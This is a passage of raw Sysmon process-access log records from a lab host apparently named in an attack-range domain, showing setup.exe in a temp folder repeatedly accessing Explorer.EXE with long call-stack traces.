13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000016029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.d